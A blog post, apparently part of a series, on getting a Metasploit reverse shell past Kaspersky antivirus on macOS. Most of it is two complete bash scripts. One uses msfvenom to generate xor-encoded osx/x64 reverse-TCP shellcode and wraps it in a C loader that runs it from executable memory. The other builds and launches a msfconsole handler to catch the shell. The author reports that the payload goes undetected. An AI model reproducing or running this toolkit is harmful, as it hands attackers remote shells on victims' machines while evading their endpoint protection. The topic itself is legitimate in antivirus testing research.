Next in line for the tests is Kaspersky. (There has lately been some political turmoil about them, which is kind of childish: the US accusing Russia of spying... haha... these two countries have been spying on each other for decades... yawn.)
There is no free version, so we are stuck with the trial, which you can download from https://usa.kaspersky.com/mac-security
TL;DR: we can get the same code executed just fine as with Avast, using our custom payload from https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/ I was also curious about the Network Attack Blocker function on OSX, as I remember that on Windows it was quite good at blocking certain meterpreter operations.
Kaspersky detects all EICAR and standard msfvenom-generated payloads, as well as the JAR payloads.
So again we try the custom source code template and the shellcode, as shown here.
Here is a generator for the above to make life easier: OSX-x64-payload-generator.sh
#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port

# The script expects to live inside the metasploit-framework directory,
# next to the msfvenom binary.
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
  echo '[*] Found msfvenom in current path ........ good'
else
  echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
  exit 1
fi

echo '[*] Cleaning up '
rm -f osx64-payload.c

# Generate the shellcode as a C byte array (unsigned char buf[]) into test.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST="$IP" LPORT="$port" -a x64 --platform OSX -e x64/xor -f c -o test.c

# Build the C source template around the generated buffer
echo '#include <stdio.h>' > temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c
echo '#include <stdint.h>' >> temp.c
echo '' >> temp.c
cat test.c >> temp.c
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo '    /* one anonymous RWX page, then copy the buffer in and jump to it */' >> temp.c
echo '    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo '    printf("ret: %p\n", ptr);' >> temp.c
echo '    memcpy(ptr, buf, sizeof buf);' >> temp.c
echo '    void (*fp)() = (void (*)())ptr;' >> temp.c
echo '    fp();' >> temp.c
echo '    return 0;' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c

if [ -f ./osx64-payload.c ]; then
  echo '[*] osx64-payload.c generated ...'
  ls -la osx64-payload.c
else
  echo '[-] Something went wrong .. '
  exit 1
fi
And the listener: LISTENER-MAC-LATEST.sh
#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh
echo -n "$host" >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n "$port" >> run.listener.sh
echo -n '; run"' >> run.listener.sh
chmod +x run.listener.sh
./run.listener.sh
Here we have some screenshots of the compilation and execution of the custom Metasploit payload on OSX with Kaspersky installed.
That's all for now :)